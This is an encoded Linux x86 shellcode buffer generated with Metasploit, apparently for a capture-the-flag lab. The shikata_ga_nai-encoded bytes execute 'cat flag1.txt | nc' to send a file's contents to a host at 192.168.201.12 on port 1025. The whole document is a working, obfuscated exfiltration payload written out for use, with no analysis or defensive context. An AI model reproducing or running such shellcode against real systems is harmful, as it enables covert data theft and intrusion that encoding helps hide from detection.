# linux/x86/exec - 106 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, MeterpreterDebugLevel=0, 
# RemoteMeterpreterDebugFile=, CMD=cat flag1.txt | nc -w 3 
# 192.168.201.12 1025
buf = 
"\xb8\x85\x9d\x1a\x3b\xd9\xea\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x14\x83\xc7\x04\x31\x47\x11\x03\x47\x11\xe2\x70\xf7" +
"\x11\x63\xe3\x5a\x40\xfb\x3e\x38\x05\x1c\x28\x91\x66\x8b" +
"\xa8\x85\xa7\x29\xc1\x3b\x31\x4e\x43\x2c\x6d\x91\x63\xac" +
"\x0d\xf0\x17\x8c\xb7\x9e\xb6\xab\x06\x71\x4c\x4c\x1d\xad" +
"\xd0\x8c\xb3\xce\x08\xe0\x3c\x31\x7b\xda\xf3\x08\x49\x34" +
"\xc5\x5c\x95\x66\x17\x91\xd4\x58\x66\xe3\x36\x94\xb8\x31" +
"\x03\xd6\xef\x66\xe2\x37\xc2\x09"
